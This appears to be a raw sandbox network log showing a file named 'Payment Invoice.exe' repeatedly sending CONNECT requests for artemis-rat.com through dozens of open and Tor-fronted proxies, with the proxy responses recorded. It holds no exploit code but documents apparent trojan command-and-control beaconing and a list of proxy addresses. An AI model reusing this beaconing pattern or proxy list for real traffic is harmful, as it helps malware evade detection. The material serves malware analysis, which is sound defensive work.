                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1719192.168.2.45513737.235.53.20867897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.599490881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1720192.168.2.455138111.90.150.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.608510017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1721192.168.2.45472472.49.49.11310347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.608772039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1722192.168.2.455140119.91.214.11933897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.608871937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1723192.168.2.45455545.125.222.97472397076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.608871937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1724192.168.2.454363104.200.152.3041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.611521006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1725192.168.2.45506742.49.148.16790017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.611593008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.118170977 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1726192.168.2.451018161.34.67.8331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.619313002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.942285061 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1727192.168.2.454756198.52.241.189997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.619579077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.776973009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841655970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.886363029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.886136055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.886111021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.889318943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:34.886126995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.269608974 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1728192.168.2.453220184.170.245.14841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.619932890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1729192.168.2.45378864.56.150.10231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.620052099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.864718914 CET1254INHTTP/1.1 403 Forbidden
                                                                Server: squid/3.5.28
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 952
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                Content-Language: en
                                                                X-Cache: MISS from ah_test
                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 35 3a 32 32 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:15:22 GMT</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1730192.168.2.45474051.158.76.35163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.620052099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714505911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714723110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.828398943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.396080971 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1731192.168.2.45105445.159.189.24431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.056356907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:24.166946888 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1732192.168.2.455143177.38.5.1641537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.057846069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1733192.168.2.454830103.23.100.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.065124989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1734192.168.2.45101591.134.140.160328967076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.065125942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183305979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1735192.168.2.45322643.243.141.1982287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.066755056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1736192.168.2.451153170.80.242.989997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.079487085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.095345020 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1737192.168.2.454847103.121.39.15810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.079828024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1738192.168.2.454056192.252.215.5161377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.079834938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1739192.168.2.451133212.110.188.189344057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.111996889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216517925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.479926109 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1740192.168.2.453352168.126.74.132807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.125209093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183212042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264677048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386671066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.386164904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.479875088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:48.397130966 CET60INHTTP/1.0 200 Connection Established
                                                                Proxy-agent: Apache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1741192.168.2.45514927.96.235.171807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.125262976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1742192.168.2.45488351.158.98.211163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.125266075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183234930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.458817005 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
